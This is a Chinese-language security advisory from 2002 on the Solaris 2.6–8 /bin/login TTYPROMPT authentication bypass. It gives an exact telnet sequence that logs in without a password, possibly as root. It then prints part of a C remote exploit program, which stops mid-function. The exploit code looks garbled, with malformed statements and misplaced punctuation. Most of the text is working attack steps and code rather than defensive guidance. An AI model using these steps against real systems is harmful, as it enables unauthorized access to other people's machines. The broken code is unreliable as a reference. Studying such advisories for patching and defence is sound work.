Sun Solaris /bin/login验证绕过漏洞
发布日期:2002-10-02
更新日期:2002-10-05
受影响系统:
Sun login
- Sun Solaris 8.0 x86
- Sun Solaris 8.0 SPARC
- Sun Solaris 7.0 SPARC
- Sun Solaris 7.0
- Sun Solaris 2.6 SPARC
- Sun Solaris 2.6
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 5848
Solaris 2.6, 7, 和8的/bin/login存在一个漏洞,能够通过环境变量TTYPROMPT绕过验证。
远程攻击者只需在telnet里给环境变量TTYPROMPT简单定义成长度为6的字符串,然后连接上远程主机,再输入用户名,后面跟64个" c",最后加一个回车就能够以这个用户直接登陆到系统而无需口令验证。假如系统允许root用户远程登陆,就能够直接得到root用户的控制权。
<*来源:Jonathan Stuart (jons@ccpartnersltd.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103357889303304&w=2
*>
测试方法:
--------------------------------------------------------------------------------
Jonathan Stuart (jons@ccpartnersltd.com)提供了如下测试方法:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
lion(lion@cnhonker.net) 提供了如下测试程式:
/******************************************************************
Solaris 2.6, 7, and 8 /bin/login TTYPROMPT remote exploit.
Tested for:
SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc
SunOS 5.7, 5.8 x86
Code by lion
lion@cnhonker.net
Welcome to HUC website http://www.cnhonker.com
******************************************************************/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/telnet.h>
#define BUFLEN 1024
char shellcode[]= "\x97\x97\x97\x97\x97\x97";
void usage(char *p)
{
printf("Usage: %s [-u user] [-p port] <-h host>\n\n", p);
printf(" -u: login username (default: bin), try \"root\"
\n"
;printf(" -p: port to use (default: 23)\n\n"
;printf("\n"
; exit(0);
}
void msg(char *msg)
{
perror(msg);
exit(errno);
}
u_int32_t get_ip(char *host)
{
struct hostent *hp;
if(!(hp = gethostbyname(host))){
fprintf(stderr, "cannot resolve %s\n", host);
return(0);
}
return(*(u_int32_t *)hp->h_addr_list[0]);
}
int get_socket(char *target, int port)
{
int sock;
u_int32_t ip;
struct sockaddr_in sin;
if(!(ip = get_ip(target)))
return(0);
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = ip;
if(!(sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
msg("socket"
;if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
msg("connect"
;return(sock);
}
void send_wont(int sock, int option)
{
char buf[3], *ptr=buf;
*ptr = IAC;
*ptr = WONT;
*ptr = (unsigned char)option;
if(write(sock, buf, 3) < 0)
msg("write"
;return;
}
void send_will(int sock, int option)
{
char buf[3], *ptr=buf;
*ptr = IAC;
*ptr = WILL;
*ptr = (unsigned char)option;
if(write(sock, buf, 3) < 0)
msg("write"
;return;
}
void send_do(int sock, int option)
{
char buf[3], *ptr=buf;
*ptr = IAC;
*ptr = DO;
*ptr = (unsigned char)option;
if(write(sock, buf, 3) < 0)
msg("write"
;return;
}
void send_env(int sock, char *name, char *value)
{
char buf[BUFLEN], *ptr = buf;
*ptr = IAC;
*ptr = SB;
*ptr = TELOPT_NEW_ENVIRON;
*ptr = TELQUAL_IS;
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
